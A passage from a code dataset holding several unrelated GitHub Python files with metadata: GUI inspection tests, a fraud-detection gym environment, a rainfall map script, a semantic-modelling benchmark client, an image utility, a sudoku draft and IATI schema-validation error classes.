app = app, root = root\n )\n\n assert self.frame_init.call_args == call(\n frame, parent = parent, pos = pos, size = size, config = config, locals = crust_locals, app = app\n )\n assert frame.locals['root'] == root\n\n\n@fixture\ndef tree_fixture(request):\n with patch(f'{inspection.__name__}.get_root') as get_root:\n root = WxNode(Mock(), Mock())\n get_root.side_effect = lambda: root\n request.cls.root = root\n with patch(f'{inspection.__name__}.InspectionTree.__init__') as tree_init:\n tree_init.side_effect = lambda *a, **kw: None\n with patch(f'{inspection.__name__}.InspectionTree.BuildTree') as super_build:\n tree = ViewInspectionTree()\n tree.roots = []\n tree.built = False\n tree.DeleteAllItems = Mock()\n tree.SetItemData = Mock()\n tree.SelectObj = Mock()\n tree.AppendItem = Mock()\n\n tree.GetCount = Mock()\n tree.GetCount.side_effect = lambda: 0\n\n root_item = Mock()\n tree.AddRoot = Mock()\n tree.AddRoot.side_effect = lambda *a: root_item\n\n request.cls.tree = tree\n request.cls.root_item = root_item\n request.cls.super_build = super_build\n yield super_build\n\n\nclass Item:\n\n def __init__(self, parent, name = None):\n self.parent: str = parent\n self.name: str = name\n\n def __eq__(self, other):\n return self.parent == other.parent and self.name == other.name\n\n def __hash__(self):\n return hash((self.parent, self.name))\n\n\ndef _node(name, children = None):\n node = WxNode(name, Mock())\n node._children = children if children else []\n return node\n\n\n@mark.usefixtures('tree_fixture')\nclass ViewInspectionTreeTests:\n \"\"\"ViewInspectionTree tests\"\"\"\n\n root: WxNode\n tree: ViewInspectionTree\n root_item: Mock\n super_build: Mock\n\n @mark.parametrize('items_count, should_clear', [\n (0, False),\n (1, True),\n (5, True)\n ]) # yapf: disable\n def test_clears_tree_before_build(self, items_count, should_clear):\n \"\"\"should clear tree before build\"\"\"\n self.tree.GetCount.side_effect = lambda c = items_count: c\n\n self.tree.BuildTree(self.root)\n\n assert self.tree.DeleteAllItems.called == should_clear\n\n def test_sets_root_node(self):\n \"\"\"should set app node as tree root\"\"\"\n self.tree.BuildTree(WxNode(Mock(), Mock()))\n\n assert self.tree.AddRoot.call_args == call(self.tree._get_node_name(self.root))\n assert self.tree.SetItemData.call_args_list[0] == call(self.root_item, self.root)\n assert self.tree.roots == [self.root_item]\n\n @mark.parametrize('children, items', [\n ([], []),\n ([_node('1')], [Item('root', '1')]),\n ([_node('1'), _node('2')], [Item('root', '1'), Item('root', '2')]),\n ([\n _node('1', [_node('1.1'), _node('1.2')]),\n _node('2', [_node('2.1')])\n ],\n [\n Item('root', '1'),\n Item('1', '1.1'), Item('1', '1.2'),\n Item('root', '2'),\n Item('2', '2.1')\n ]),\n ([\n _node('1', [_node('1.1')]),\n _node('2', [\n _node('2.1', [_node('2.1.1')]),\n _node('2.2', [_node('2.2.1'), _node('2.2.2')]),\n ])\n ],\n [\n Item('root', '1'), Item('1', '1.1'),\n Item('root', '2'),\n Item('2', '2.1'), Item('2.1', '2.1.1'),\n Item('2', '2.2'), Item('2.2', '2.2.1'), Item('2.2', '2.2.2')\n ])\n ]) # yapf: disable\n def test_adds_children(self, children, items):\n \"\"\"Should add node children to tree\"\"\"\n actual_items = []\n self.root._children = children\n self.root._instance = 'root'\n self.tree.AddRoot.side_effect = lambda _: Item('')\n self.tree.AppendItem.side_effect = lambda parent, _: Item(parent.name)\n self.tree.SetItemData.side_effect = lambda item, node: self._set_item_data(item, node, actual_items)\n\n self.tree.BuildTree(self.root)\n\n assert actual_items == [Item('', 'root')] + items\n\n @staticmethod\n def _set_item_data(item, node, items):\n item.name = node.instance\n items.append(item)\n\n def test_selects_obj(self):\n \"\"\"should select start node\"\"\"\n node = WxNode(Mock(), Mock())\n self.tree.BuildTree(node)\n\n assert self.tree.SelectObj.call_args == call(node)\n\n def test_sets_built_flag(self):\n \"\"\"should set built flag to true\"\"\"\n self.tree.BuildTree(WxNode(Mock(), Mock()))\n\n assert self.tree.built\n\n @mark.parametrize(\n 'start_widget, include_sizers, expand_frame', [(Mock(), False, True), (Item(''), True, False),\n (Mock(), True, True), (Item('root'), False, False)]\n )\n def test_builds_widget_tree_for_widget(self, start_widget, include_sizers, expand_frame):\n \"\"\"should build default widget tree if passed object other then Node\"\"\"\n self.tree.BuildTree(start_widget, include_sizers, expand_frame)\n\n assert self.super_build.call_args == call(\n start_widget, includeSizers = include_sizers, expandFrame = expand_frame\n )\n\n\n@fixture\ndef info_fixture(request):\n with patch(f'{inspection.__name__}.InspectionInfoPanel.__init__'), \\\n patch(f'{inspection.__name__}.InspectionInfoPanel.UpdateInfo') as super_update_info:\n request.cls.result = None\n info = ViewInspectionInfoPanel()\n info.SetText = Mock()\n info.SetText.side_effect = lambda text, test = request.cls: setattr(test, 'result', text)\n info.SetReadOnly = Mock()\n\n request.cls.info = info\n request.cls.super_update_info = super_update_info\n yield super_update_info\n\n\n@mark.usefixtures('info_fixture')\nclass ViewInspectionInfoPanelTests:\n \"\"\"ViewInspectionInfoPanel tests\"\"\"\n\n info: ViewInspectionInfoPanel\n super_update_info: Mock\n result: Optional[str]\n\n def test_checks_object_none(self):\n \"\"\"Should set message that object is None\"\"\"\n self.info.UpdateInfo(None)\n\n assert self.result == 'Item is None or has been destroyed.'\n\n @mark.parametrize('obj', [Mock(), Item('')])\n def test_uses_super_info(self, obj):\n \"\"\"should use super().UpdateInfo() for object other than Node\"\"\"\n self.info.UpdateInfo(obj)\n\n assert self.super_update_info.call_args == call(obj)\n\n @mark.parametrize('error', [RuntimeError()])\n def test_handles_error(self, error: Exception):\n \"\"\"should str errors and say that can't show info\"\"\"\n self.super_update_info.side_effect = lambda _: self._raise(error)\n self.info.UpdateInfo(Mock())\n\n assert self.result is not None\n assert self.result.startswith('Failed to show info.')\n\n @staticmethod\n def _raise(error):\n raise error\n","repo_name":"eumis/wxviews","sub_path":"wxviews/tests/inspection_tests.py","file_name":"inspection_tests.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"8446897985","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport pandas as pd\nimport random\nimport json\n\n\"\"\"\nhttps://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html#dqn-algorithm\n\n\"\"\"\n\n\nclass FraudDetectionEnv(gym.Env):\n def __init__(self):\n \"\"\"\n action space -\n\n 0 -> non_fraud\n 1 -> fraud\n\n Observation space -\n\n 1 -> correctly predicted\n 2 -> wrongly predicted\n\n Rewards -\n\n +1 : correct prediction\n -1 : wrong prediction\n 0 : initial value of reward\n\n Episode termination -\n\n An episode will terminate if agent guesses correctly (cummulative_reward > 0) or 200 steps have been completed\n\n Experience Replay -\n\n Agent will use experience replay for guidance\n\n \"\"\"\n self.credit_card_dataset = './dataset/creditcard.csv'\n self.df_credit_card = pd.DataFrame(pd.read_csv(self.credit_card_dataset))\n\n self.ACTION_LOOKUP = {0: 'not_fraud', 1: 'fraud'}\n\n self.observation_space = spaces.Discrete(self.df_credit_card.shape[0])\n self.action_space = spaces.Discrete(len(self.ACTION_LOOKUP))\n\n\n self.observation = 0\n\n self.initial_state = 0\n\n self.episode_over = False\n self.turns = 0\n self.turns_max = 200\n self.cummulative_rewards = 0\n self.action = 0\n self.state_idx = 0\n self.state = self.df_credit_card.iloc[self.state_idx, :]\n\n self.true_positives = 0\n self.true_negatives = 0\n self.false_postives = 0\n self.false_negatives = 0\n\n self.total_positive_cases, self.total_negative_cases = self.total_positives_and_negatives()\n\n\n def total_positives_and_negatives(self):\n n_fraud = 0\n n_non_fraud = 0\n for state_idx in range(self.df_credit_card.shape[0]):\n if self.label_for(state_idx) == 1:\n n_fraud += 1\n else:\n n_non_fraud += 1\n\n return (n_fraud, n_non_fraud)\n\n\n\n def create_info_json_data(self, true_positive_rate, false_positive_rate):\n data_set = {\"true_positive_rate\" : true_positive_rate,\n \"false_positive_rate\": false_positive_rate,\n }\n return json.dumps(data_set)\n\n\n def label_for(self, state_idx):\n return self.df_credit_card.iloc[state_idx]['Class']\n\n # this step will return (next_state, reward, episode_over, more_info (tpr, tnr, fpr, fnr))\n def step(self, action):\n \"\"\"\n Parameters\n ----------\n action_index :\n Returns\n -------\n ob, reward, episode_over, info : tuple\n ob (object) :\n an environment-specific object representing your observation of\n the environment.\n reward (float) :\n amount of reward achieved by the previous action. The scale\n varies between environments, but the goal is always to increase\n your total reward.\n episode_over (bool) :\n whether it's time to reset the environment again. Most (but not\n all) tasks are divided up into well-defined episodes, and done\n being True indicates the episode has terminated. (For example,\n perhaps the pole tipped too far, or you lost your last life.)\n info (dict) :\n diagnostic information useful for debugging. It can sometimes\n be useful for learning (for exam ple, it might contain the raw\n probabilities behind the environment's last state change).\n However, official evaluations of your agent are not allowed to\n use this for learning.\n \"\"\"\n\n # extracting next state\n #assert self.action_space.contains(action)\n\n label_for_current_state = self.label_for(self.state_idx)\n\n # reward\n reward = 0\n\n\n # agent predicted fraud\n if action == 1:\n if label_for_current_state == 1:\n self.true_positives += 1\n reward += 1\n else:\n self.false_postives += 1\n reward -= 1\n\n # agent predicted non_fraud\n elif action == 0:\n if label_for_current_state == 0:\n self.true_negatives += 1\n reward += 1\n else:\n self.false_negatives += 1\n reward -=1\n\n if self.state_idx <= self.df_credit_card.shape[0] - 2:\n self.state_idx += 1\n\n self.turns += 1\n\n fpr = self.false_postives / (self.false_postives + self.true_negatives)\n tpr = self.true_positives / (self.true_positives + self.false_negatives)\n\n info = self.create_info_json_data(tpr, fpr)\n\n if self.state_idx == (self.df_credit_card.shape[0]-1):\n self.episode_over = True\n\n print('State idx : {}'.format(self.state_idx))\n print('Value of next_state : {}'.format(self.df_credit_card.iloc[self.state_idx, :-1].values))\n\n\n\n return self.df_credit_card.iloc[self.state_idx, :-1].values, reward, self.episode_over, info\n\n \n\n def reset(self):\n self.turns = 0\n self.episode_over = False\n self.sum_rewards = 0.0\n\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n","repo_name":"purvasingh96/gym-fraud-detection","sub_path":"gym_fraud_detection/envs/fraud_detection_env.py","file_name":"fraud_detection_env.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29685523982","text":"from pyecharts import options as opts\nfrom pyecharts.charts import Map\nimport numpy as np\n#渲染地理图表\ndef weatherAna(filename):\n\t#读取降水量数据\n wea_data=np.loadtxt(filename,dtype=str,delimiter=\",\",encoding=\"GBK\")\n map=(\n Map().add(\"降雨(mm)\",wea_data,\"河南\")\n .set_global_opts(title_opts=opts.TitleOpts(title=\"河南省降水示例\"),\n\tvisualmap_opts=opts.VisualMapOpts(max_=300,is_piecewise=True))\n \t)\n map.render(\"weather.html\")\t#渲染html文件\n\nif __name__ == '__main__':\n weatherAna(\"weather.csv\")\n","repo_name":"ldjackie/ldjackie","sub_path":"code/chapter9/9-3降水数据分析与可视化.py","file_name":"9-3降水数据分析与可视化.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14019015052","text":"# ===========\n# SETUP\n# ===========\ntry:\n import serene\nexcept ImportError as e:\n import sys\n sys.path.insert(0, '.')\n import serene\n\nimport os\nimport time\nimport tarfile\nimport tempfile\nfrom pprint import pprint\n\nfrom serene import SSD, Status, DataProperty, Mapping, ObjectProperty, Column, Class, DataNode, ClassNode\nfrom serene.elements.semantics.base import KARMA_DEFAULT_NS\n\n\n# =======================\n#\n# Step 1: Start with a connection to the server...\n#\n# =======================\nsn = serene.Serene(\n host='127.0.0.1',\n port=8080,\n)\nprint(sn)\n\nbenchmark_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"tests\", \"resources\", \"museum_benchmark\")\nprint(\"benchmark_path: \", benchmark_path)\n\nprint(\"========Optional cleaning=============\")\n# Removes all server elements\nfor octo in sn.octopii.items:\n sn.octopii.remove(octo)\n\nfor ssd in sn.ssds.items:\n sn.ssds.remove(ssd)\n\nfor ds in sn.datasets.items:\n sn.datasets.remove(ds)\n\nfor on in sn.ontologies.items:\n sn.ontologies.remove(on)\n\n# =======================\n#\n# Step 2: Add ontologies from the museum benchmark\n#\n# =======================\nowl_dir = os.path.join(benchmark_path, \"owl\")\n\nontologies = []\nfor path in os.listdir(owl_dir):\n f = os.path.join(owl_dir, path)\n ontologies.append(sn.ontologies.upload(f))\n\nprint(\"*********** Ontologies from museum benchmark\")\nfor onto in ontologies:\n print(onto)\nprint()\n\n# =======================\n#\n# Step 3: Add datasets from the museum benchmark and corresponding semantic source descriptions\n#\n# =======================\ndataset_dir = os.path.join(benchmark_path, \"dataset\")\nssd_dir = os.path.join(benchmark_path, \"ssd\")\n\ndatasets = [] # list of museum datasets\nssds = [] # list of semantic source descriptions from museum benchmark\n\n# we need to unzip first the data\nif os.path.exists(os.path.join(dataset_dir, \"data.tar.gz\")):\n with tarfile.open(os.path.join(dataset_dir, \"data.tar.gz\")) as f:\n f.extractall(path=dataset_dir)\n\ninput(\"Press enter to upload datasets and ssds...\")\n\nfor ds in os.listdir(dataset_dir):\n if ds.endswith(\".gz\"):\n continue\n ds_f = os.path.join(dataset_dir, ds)\n ds_name = os.path.splitext(ds)[0]\n # associated semantic source description for this dataset\n ssd_f = os.path.join(ssd_dir, ds_name + \".ssd\")\n\n print(\"Adding dataset: \" + str(ds_f))\n dataset = sn.datasets.upload(ds_f, description=\"museum_benchmark\")\n datasets.append(dataset)\n\n print(\"Adding ssd: \" + str(ssd_f))\n new_json = dataset.bind_ssd(ssd_f, ontologies, KARMA_DEFAULT_NS)\n # _logger.info(\"+++++++++++ obtained ssd json\")\n # _logger.info(new_json)\n if len(new_json[\"mappings\"]) < 1:\n print(\" --> skipping this file...\")\n continue\n else:\n empty_ssd = SSD(dataset, ontologies)\n ssd = empty_ssd.update(new_json, sn.datasets, sn.ontologies)\n ssds.append(sn.ssds.upload(ssd))\n # we remove the csv dataset\n os.remove(ds_f)\n\n\nif len(datasets) != len(ssds):\n print(\"Something went wrong. Failed to read all datasets and ssds.\")\n exit()\n\ninput(\"Press enter to continue...\")\nprint(\"*********** Datasets and semantic source descriptions from museum benchmark\")\nfor i, ds in enumerate(datasets):\n print(i, \": dataset=\", ds, \"; ssd=\", ssds[i])\nprint()\n\n# =======================\n#\n# Step 4: Specify training and test samples\n#\n# =======================\ntrain_sample = []\ntest_sample = []\n\n# s16 will be test\nfor i, ds in enumerate(datasets):\n if \"s07\" in ds.filename:\n test_sample.append(i)\n else:\n # if \"s07\" in ds.filename or \"s08\" in ds.filename:\n train_sample.append(i)\n\n# train_sample = train_sample[:5]\n\nprint(\"Indexes for training sample: \", train_sample)\nprint(\"Indexes for testing sample: \", test_sample)\n\n# =======================\n#\n# Step 5: Create octopus\n#\n# =======================\n\nocto_local = sn.Octopus(\n ssds=[ssds[i] for i in train_sample],\n ontologies=ontologies,\n name='octopus-without-s07',\n description='Testing example for places and companies',\n resampling_strategy=\"BaggingToMean\", # optional\n num_bags=10, # optional\n bag_size=30, # optional\n model_type=\"randomForest\",\n modeling_props={\n \"compatibleProperties\": True,\n \"ontologyAlignment\": True,\n \"addOntologyPaths\": True,\n \"mappingBranchingFactor\": 50,\n \"numCandidateMappings\": 10,\n \"topkSteinerTrees\": 50,\n \"multipleSameProperty\": True,\n \"confidenceWeight\": 1.0,\n \"coherenceWeight\": 1.0,\n \"sizeWeight\": 0.5,\n \"numSemanticTypes\": 10,\n \"thingNode\": False,\n \"nodeClosure\": True,\n \"propertiesDirect\": True,\n \"propertiesIndirect\": True,\n \"propertiesSubclass\": True,\n \"propertiesWithOnlyDomain\": True,\n \"propertiesWithOnlyRange\": True,\n \"propertiesWithoutDomainRange\": False,\n \"unknownThreshold\": 0.05\n },\n feature_config={\n \"activeFeatures\": [\n \"num-unique-vals\",\n \"prop-unique-vals\",\n \"prop-missing-vals\",\n \"ratio-alpha-chars\",\n \"prop-numerical-chars\",\n \"prop-whitespace-chars\",\n \"prop-entries-with-at-sign\",\n \"prop-entries-with-hyphen\",\n \"prop-range-format\",\n \"is-discrete\",\n \"entropy-for-discrete-values\",\n \"shannon-entropy\"\n ],\n \"activeFeatureGroups\": [\n \"char-dist-features\",\n \"inferred-data-type\",\n \"stats-of-text-length\",\n \"stats-of-numeric-type\"\n ,\"prop-instances-per-class-in-knearestneighbours\"\n ,\"mean-character-cosine-similarity-from-class-examples\"\n # ,\"min-editdistance-from-class-examples\"\n # ,\"min-wordnet-jcn-distance-from-class-examples\"\n # ,\"min-wordnet-lin-distance-from-class-examples\"\n ],\n \"featureExtractorParams\": [\n {\n \"name\": \"prop-instances-per-class-in-knearestneighbours\",\n \"num-neighbours\": 3\n }\n # , {\n # \"name\": \"min-editdistance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }, {\n # \"name\": \"min-wordnet-jcn-distance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }, {\n # \"name\": \"min-wordnet-lin-distance-from-class-examples\",\n # \"max-comparisons-per-class\": 3\n # }\n ]\n }\n)\n\n# add this to the endpoint...\nprint(\"Now we upload to the server\")\nocto = sn.octopii.upload(octo_local)\n\nprint(\"Uploaded octopus:\", octo)\n\n# =======================\n#\n# Step 6. Train\n#\n# =======================\n\nstart = time.time()\nprint()\nprint(\"Next we can train the Octopus\")\nprint(\"The initial state for {} is {}\".format(octo.id, octo.state))\nprint(\"Training...\")\nocto.train()\nprint(\"Done in: {}\".format(time.time() - start))\nprint(\"The final state for {} is {}\".format(octo.id, octo.state))\n\nif octo.state.status in {Status.ERROR}:\n print(\"Something went wrong. Failed to train the Octopus.\")\n exit()\n\n# =======================\n#\n# Step 7. Predict\n#\n# =======================\n\nstart = time.time()\npredicted = octo.predict(datasets[test_sample[0]])\nprint(\"Prediction done in: {}\".format(time.time() - start))\nprint(predicted)\n\nprint()\nprint(\"Showing ground truth...\")\n# ssds[test_sample[0]] is ground truth\nground_truth = ssds[test_sample[0]]\nground_truth.show(title='ground truth',\n outfile=os.path.join(tempfile.gettempdir(), 'ground_truth.png'))\ninput(\"Press enter to see predicted semantic models...\")\n\nprint(\"><><><><\")\nfor res in predicted:\n print(res)\n print()\n res.ssd.show()\n input(\"Press enter to continue...\")\nprint(\"><><><><\")\n\n# for p in predicted:\n# print(\"Predicted candidate rank\", p.score.rank)\n# print(\"Score:\")\n# p.score.show()\n# p.ssd.show()\n# input(\"Press any key to continue...\")\n\n# the best is number 0!\npredicted_ssd = predicted[0].ssd\n# predicted_ssd.unmapped_columns\nprint()\nprint(\"============Best recommendation=========\")\nprint(predicted_ssd)\n\nprint(\"Mappings:\")\nfor map in predicted_ssd.mappings.items():\n print(map)\n\nprint(\"Unmapped columns:\")\nprint(predicted_ssd.unmapped_columns)\nprint()\n\nprint(\"Columns: \")\nfor col in predicted_ssd.columns:\n print(\"name={}, id={}\".format(col.name, col.id))\n\nprint()\nprint(predicted_ssd.json)\nprint()\npprint(predicted_ssd.json)\ninput(\"Press enter to continue...\")\n# =======================\n#\n# Step 8. Evaluate against ground truth\n#\n# =======================\n\n# ssds[test_sample[0]] is ground truth\nground_truth = ssds[test_sample[0]]\ncomparison = sn.ssds.compare(predicted_ssd, ground_truth, False, False)\npredicted_ssd.show(title=\"best recommendation: \\n\"+str(comparison),\n outfile=os.path.join(tempfile.gettempdir(), 'best_recommendation.png'))\n# ground_truth.show(title='ground truth',\n# outfile=os.path.join(tempfile.gettempdir(), 'ground_truth.png'))\nprint(\"================\")\n\ninput(\"Press enter to continue...\")\nfor i, pred in enumerate(predicted):\n comparison = sn.ssds.compare(pred.ssd, ssds[test_sample[0]], False, False)\n print(\"SsdResult({}) comparison: {}\".format(i,comparison))","repo_name":"NICTA/serene-python-client","sub_path":"doc/museum_benchmark.py","file_name":"museum_benchmark.py","file_ext":"py","file_size_in_byte":9299,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"73517769527","text":"import numpy as np\n\nfrom PIL import Image, ImageDraw\nfrom pathlib import Path\nfrom cairosvg import svg2png\nfrom icecream import ic\n\n\nclass ImgUtil:\n def __init__(self, verbose=False):\n self.verbose = verbose\n\n @staticmethod\n def circle_bbox(x, y, r):\n return list(map(int, [x-r, y-r, x+r, y+r]))\n\n def draw_circle(self, img, x, y, r, outline=None, fill=None, width=1):\n draw = ImageDraw.Draw(img)\n bbox = ImgUtil.circle_bbox(x, y, r)\n draw.ellipse(bbox, outline=outline, fill=fill, width=width)\n if self.verbose:\n ic(f'Ellipse drawn with bounding box {bbox}')\n\n def svg2img(self, f, sz=4000):\n \"\"\"\n Converts an SVG file to a pillow image\n \"\"\"\n fnm = Path(f).with_suffix('') # Remove file ext.\n sz = int(sz)\n fnm_png = f'{fnm}, {sz}.png'\n\n if not Path(fnm_png).exists():\n s = open(f, 'rb').read()\n svg2png(bytestring=s, parent_width=sz, parent_height=sz, write_to=fnm_png)\n if self.verbose:\n ic(f'SVG converted to PNG file: {fnm_png}')\n else:\n if self.verbose:\n ic(f'Using converted PNG file: {fnm_png}')\n\n im = Image.open(fnm_png)\n w, h = im.size\n if w > sz or h > sz:\n im.thumbnail((sz, sz), Image.ANTIALIAS)\n im.save(fnm_png)\n return im\n\n def refill_color(\n self,\n img,\n c_ori: tuple[int, int, int],\n c_new: tuple[int, int, int]\n ):\n arr = np.array(img)\n r, g, b, a = arr.T\n r_o, g_o, b_o = c_ori\n area = (r == r_o) & (b == b_o) & (g == g_o)\n arr[..., :-1][area.T] = c_new\n\n img_new = Image.fromarray(arr)\n if self.verbose:\n ic(f'Image filled with {c_ori} converted to {c_new}')\n return img_new\n\n @staticmethod\n def lightness(c, f):\n \"\"\"\n :return: Original color in a different shade/tint\n\n Positive `f` for tint, negative for shade\n \"\"\"\n if f == 0:\n return c\n else:\n c_new = tuple(map(\n (lambda x: x + (255 - x) * f) if f > 0 else (lambda x: x * (1 + f)),\n c\n ))\n return tuple(map(int, c_new))\n\n def sweep_alpha(self, img, f):\n arr = np.array(img)\n r, g, b, a = arr.T\n arr[..., -1] = a.T * f\n img_new = Image.fromarray(arr)\n if self.verbose:\n ic(f'Image alpha channel multiplied by {f}')\n return img_new\n","repo_name":"StefanHeng/Image-Cloud-Generator","sub_path":"img_util.py","file_name":"img_util.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34925342589","text":"# This script shows the bases for the algorithm\n\nimport numpy as np\nimport itertools\n\na = [\n [0, 3, 5, 2, 9, 0, 8, 6, 4],\n [0, 8, 2, 4, 1, 0, 7, 0, 3],\n [7, 6, 4, 3, 8, 0, 0, 9, 0],\n [2, 1, 8, 7, 3, 9, 0, 4, 0],\n [0, 0, 0, 8, 0, 4, 2, 3, 0],\n [0, 4, 3, 0, 5, 2, 9, 7, 0],\n [4, 0, 6, 5, 7, 1, 0, 0, 9],\n [3, 5, 9, 0, 2, 8, 4, 1, 7],\n [8, 0, 0, 9, 0, 0, 5, 2, 6],\n]\n\n\nnpArray = np.array(a)\n\n\n# Get all the indices where the zeros are present\nb = {j: {k: np.arange(9) for k in np.where(i == 0)[0].tolist()} for i, j in zip(\n npArray, np.arange(npArray.shape[0]))}\n\n# To get elements from row\n# Remove duplicates\n\n# you need to add the 3x3 groups\nd = {}\nfor i, k in zip(range(0, 10, 3), range(3, 10, 3)):\n for j, h in zip(range(0, 10, 3), range(3, 10, 3)):\n d[(range(i, k), range(j, h))] = np.reshape(\n npArray[i:k, j:h], npArray[i:k, j:h].size)\n\n\ndef group(row, element):\n for i, j in d.items():\n if row in i[0] and element in i[1]:\n return j\n\n# finds element that Return the sorted, unique values in ar1 that are not\n# in ar2.\n np.setdiff1d(\n b[0][0], npArray([itertools.chain(npArray[0], npArray[:, 0]), group(0, 0)]))\n np.setdiff1d(b[7][3], itertools.chain(npArray[7], npArray[:,3], group(7,3)))\n# This creates the structure that will be needed to find the results\n\n# print(a)\n# print(npArray)\n\n# The problem with this algorithm is that when a medium or hard sudoku\n# puzzle is given an infinite loop is started.\n# tree copy and self.decisionTree are the same as no more\n# possibilities can be reduced\n#\n# # Returns the index and the number of missing elements in the row for all the rows\n# b = [(index,len(elements)) for index, elements in a.items()]\n#\n# (i[0] for i in sorted(b,key=operator.itemgetter(1)))\n\n\n# Also take into consideration the 3 columns and rows\n# for i,j in a.items():\n# a[i] q[]\n#\n#\n# >>> np.setdiff1d(a.decisionTree[1][8],itertools.chain(a.decisionTree[0][6], a.decisionTree[0][8],a.decisionTree[1][7],a.decisionTree[2][7]))\n#array([2])\n","repo_name":"josecolella/Insight-Sudoku","sub_path":"src/algorithm-rough.py","file_name":"algorithm-rough.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27892490991","text":"from os.path import exists, join\nimport re\n\nfrom lxml import etree as ET\n\nfrom ..utils.exceptions import SchemaNotFoundError\nfrom ..utils.validator import Validator, ValidationError\nfrom ..utils.config import CONFIG\n\n\nclass XSDValidationError(ValidationError):\n def __init__(self, error, filetype, version):\n super(XSDValidationError, self).__init__(\n error.message, error.line, error.column, error.path)\n\n self.filetype = filetype\n self.version = version\n\n def _get_element(self):\n el_match = re.match(r\"Element '([^']+)'\", self.original_msg)\n return el_match.group(1) if el_match else None\n\n def _get_attribute(self):\n attr_match = re.search(r\" attribute '([^']+)'\", self.original_msg)\n return attr_match.group(1) if attr_match else None\n\n def _get_expecteds(self):\n expected_match = re.search(r'\\( ([^)]+) \\)', self.original_msg)\n if not expected_match:\n return []\n return [ex for ex in expected_match.group(1).split(', ')\n if not ex.startswith('##')]\n\n def _get_value(self):\n value_re = re.compile(r\"Element '[^']+'(?:, attribute \" +\n r\"'[^']+')?: '([^']*)'\")\n value_match = value_re.match(self.original_msg)\n return value_match.group(1) if value_match else None\n\n @property\n def location(self):\n if self.column != 0:\n return 'Line {}, column {}.'.format(self.line, self.column)\n return 'Line {}.'.format(self.line)\n\n @property\n def url(self):\n if self.version in ['1.01', '1.02', '1.03']:\n # it's difficult to generate a URL for these\n return None\n path = re.sub(r'\\[[^\\]]+\\]', '', self.path)\n tmpl = 'http://reference.iatistandard.org/{version}/' + \\\n '{filetype}-standard{path}/'\n version_str = self.version.replace('.', '')\n return tmpl.format(version=version_str, path=path,\n filetype=self.filetype)\n\n @property\n def message(self):\n tmpl = '{summary}\\n\\n{details}\\n\\n{location}'\n msg = tmpl.format(summary=self.summary, details=self.details,\n location=self.location)\n url = self.url\n if url:\n msg += '\\n\\nSee: {url}'.format(url=url)\n return msg\n\n\nclass XSDDecimalTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDecimalTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.w3.org/TR/xmlschema-2/#decimal\n self.summary = 'An invalid decimal value is used.'\n if value is None:\n details = ''\n elif value == '':\n details = 'The value \"{value}\" is empty, which means ' + \\\n 'it isn\\'t a valid decimal value.'\n elif not any(map(lambda x: x.isdigit(), value)):\n details = 'The value \"{value}\" contains no digits at all, ' + \\\n 'which means it isn\\'t a valid decimal value.'\n elif ',' in value:\n details = 'The value \"{value}\" includes a comma, ' + \\\n 'which isn\\'t permitted.'\n elif '\\x9c' in value:\n details = 'The value \"{value}\" includes the special ' + \\\n 'character \"\\\\x9c\".'\n elif len(list(filter(lambda x: x.isdigit(), value))) > 18:\n details = 'The value \"{value}\" contains too many digits! ' + \\\n 'It sounds ridiculous, but XML has a hard limit ' + \\\n 'on the number of digits a decimal may contain.'\n else:\n details = 'The value \"{value}\" is not a valid decimal.'\n self.details = details.format(value=value)\n\n\nclass XSDDateTimeTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDateTimeTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.iso.org/iso-8601-date-and-time-format.html\n self.summary = 'An invalid \"dateTime\" is used.'\n details = 'Date and time values must use a very particular ' + \\\n 'format, described by ISO 8601.'\n\n if value is not None:\n details += ' The following value does not adhere to that ' + \\\n 'format: \"{value}\".'\n\n self.details = details.format(value=value)\n\n\nclass XSDDateTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDDateTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.w3.org/TR/xmlschema-2/#date\n self.summary = 'An invalid date is used.'\n details = 'Dates must use a specific format (YYYY-MM-DD).'\n\n if value is not None:\n details += ' The following value does not fit that format: ' + \\\n '\"{value}\".'\n self.details = details.format(value=value)\n\n\nclass XSDBooleanTypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDBooleanTypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n attr = self._get_attribute()\n\n # https://www.w3.org/TR/xmlschema-2/#boolean\n self.summary = 'An invalid boolean (true or false) value ' + \\\n 'is used.'\n details = 'The '\n if attr is not None:\n details += '\"{attr_name}\" attribute of the '\n details += '\"{el_name}\" element must be either \"true\", ' + \\\n '\"false\", \"1\" or \"0\". No other values are ' + \\\n 'allowed.'\n\n if value is not None:\n if value.lower() in ['true', 'false']:\n details += ' The value used is \"{value}\", which is ' + \\\n 'invalid because it is not all lowercase.'\n else:\n details += ' The value used instead is \"{value}\".'\n\n self.details = details.format(el_name=self._get_element(),\n attr_name=attr, value=value)\n\n\nclass XSDURITypeError(XSDValidationError):\n def __init__(self, error, filetype, version):\n super(XSDURITypeError, self).__init__(error, filetype, version)\n\n value = self._get_value()\n\n # https://www.w3.org/TR/xmlschema-2/#anyURI\n self.summary = 'An invalid link to a document or website ' + \\\n 'is provided.'\n details = 'The following URL is used in the 